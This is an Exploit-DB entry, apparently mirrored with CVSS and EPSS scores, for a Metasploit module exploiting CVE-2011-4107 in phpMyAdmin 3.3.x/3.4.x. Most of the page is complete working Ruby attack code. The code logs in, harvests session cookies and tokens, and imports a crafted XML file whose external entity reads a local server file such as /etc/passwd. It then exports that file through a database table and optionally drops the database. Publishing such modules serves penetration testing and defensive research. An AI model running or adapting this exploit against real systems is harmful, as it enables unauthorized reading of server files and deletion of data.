Lucene search

K
exploitdbMarco BatistaEDB-ID:18371
HistoryJan 14, 2012 - 12:00 a.m.

phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XML External Entity Injection (Metasploit)

2012-01-1400:00:00
Marco Batista
www.exploit-db.com
597

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

AI Score

6.5

Confidence

High

EPSS

0.09

Percentile

94.7%

# Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection
# Date: 12-01-2012
# Author: Marco Batista
# Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/
# Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7
# CVE : CVE-2011-4107

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize
		super(
			'Name'        => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
			'Version'     => '1.0',
			'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
			The attacker must be logged in to MySQL via phpMyAdmin.
			Works on Windows and Linux Versions 3.3.X and 3.4.X},
			'References'  =>
				[
					[ 'CVE', '2011-4107' ],
                                        [ 'OSVDB', '76798' ],
                                        [ 'BID', '50497' ],
                                        [ 'URL', 'http://secforce.com/research/'],
				],
			'Author'      => [ 'Marco Batista' ],
			'License'     => MSF_LICENSE
			)

		register_options(
			[
				Opt::RPORT(80),
				OptString.new('FILE', [ true,  "File to read", '/etc/passwd']),
				OptString.new('USER', [ true,  "Username", 'root']),
				OptString.new('PASS', [ false,  "Password", 'password']),
				OptString.new('DB', [ true,  "Database to use/create", 'hddaccess']),
				OptString.new('TBL', [ true,  "Table to use/create and read the file to", 'files']),
				OptString.new('APP', [ true,  "Location for phpMyAdmin URL", '/phpmyadmin']),
				OptString.new('DROP', [ true,  "Drop database after reading file?", 'true']),
			],self.class)
	end

	def loginprocess
		# HTTP GET TO GET SESSION VALUES
		getresponse = send_request_cgi({
			'uri'     => datastore['APP']+'/index.php',
			'method'  => 'GET',
			'version' => '1.1',
			}, 25)

		if (getresponse.nil?)
			print_error("no response for #{ip}:#{rport}")
		elsif (getresponse.code == 200)
			print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
		elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
			print_status("Received 302 to #{getresponse.headers['Location']}")
		else
			print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
		end

		valuesget = getresponse.headers["Set-Cookie"]
		varsget = valuesget.split(" ")

		#GETTING THE VARIABLES NEEDED
		phpMyAdmin = varsget.grep(/phpMyAdmin/).last
		pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
		# END HTTP GET 

		# LOGIN POST REQUEST TO GET COOKIE VALUE
		postresponse = send_request_cgi({
			'uri'     => datastore['APP']+'/index.php',
			'method'  => 'POST',
			'version' => '1.1',
			'headers' =>{
					'Content-Type' => 'application/x-www-form-urlencoded',
					'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
		                    },
			'data'    => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
			}, 25)		

		if (postresponse["Location"].nil?)
			print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
			tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last			
		else
			tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
		end
		
		
		valuespost = postresponse.headers["Set-Cookie"]
		varspost = valuespost.split(" ")
		
		#GETTING THE VARIABLES NEEDED
		pmaUser = varspost.grep(/pmaUser-1/).last
		pmaPass = varspost.grep(/pmaPass-1/).last

		return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
		# END OF LOGIN POST REQUEST
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
			print_error(e.message)
		rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
			print_error(e.message)
	end

	def readfile(cookie,tokenvalue)
		#READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
		getfiles = send_request_cgi({
			'uri'     => datastore['APP']+'/export.php',
			'method'  => 'POST',
			'version' => '1.1',
			'headers' =>{
					'Cookie' => cookie
			            },
			'data'    => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
			}, 25)
		
		if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
			print_error("Error reading the file... not enough privilege? login error?")			
		else
			print_status("#{getfiles.body}")
		end
	end


	def dropdatabase(cookie,tokenvalue)
		dropdb = send_request_cgi({
			'uri'     => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
			'method'  => 'GET',
			'version' => '1.1',
			'headers' =>{
					'Cookie' => cookie
			            },
			}, 25)

			print_status("Dropping database: "+datastore['DB'])
	end

	def run
		cookie,tokenvalue = loginprocess()
	
		print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")	
	
		craftedXML =  "------WebKitFormBoundary3XPL01T\n"
		craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n"
		craftedXML << tokenvalue+"\n"
		craftedXML << "------WebKitFormBoundary3XPL01T\n"
		craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n"
		craftedXML << "server\n"
		craftedXML << "------WebKitFormBoundary3XPL01T\n"
		craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n"
		craftedXML << "Content-Type: text/xml\n\n"
		craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
		craftedXML << "<!DOCTYPE ficheiro [  \n"
		craftedXML << "  <!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" >]>\n"
		craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\">\n"
		craftedXML << "    <pma:structure_schemas>\n"
		craftedXML << "        <pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n"
		craftedXML << "            <pma:table name=\""+datastore['TBL']+"\">\n"
		craftedXML << "                CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n"
		craftedXML << "            </pma:table>\n"
		craftedXML << "        </pma:database>\n"
		craftedXML << "    </pma:structure_schemas>\n"
		craftedXML << "    <database name=\""+datastore['DB']+"\">\n"
		craftedXML << "        <table name=\""+datastore['TBL']+"\">\n"
		craftedXML << "            <column name=\"file\">&conteudo;</column>\n"
		craftedXML << "        </table>\n"
		craftedXML << "    </database>\n"
		craftedXML << "</pma_xml_export>\n\n"
		craftedXML << "------WebKitFormBoundary3XPL01T\n"
		craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n"
		craftedXML << "xml\n"
		craftedXML << "------WebKitFormBoundary3XPL01T\n"
		craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n"
		craftedXML << ",\n\n"
		craftedXML << "------WebKitFormBoundary3XPL01T--"
		
	
		print_status("Grabbing that #{datastore['FILE']} you want...")
		res = send_request_cgi({
			'uri'     => datastore['APP']+'/import.php',
			'method'  => 'POST',
			'version' => '1.1',
			'headers' =>{
					'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
					'Cookie' => cookie
			            },
			'data'    => craftedXML
		}, 25)

		readfile(cookie,tokenvalue)

		if (datastore['DROP'] == "true")
			dropdatabase(cookie,tokenvalue)
		else
			print_status("Database was not dropped: "+datastore['DB'])			
		end

	end
end

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

AI Score

6.5

Confidence

High

EPSS

0.09

Percentile

94.7%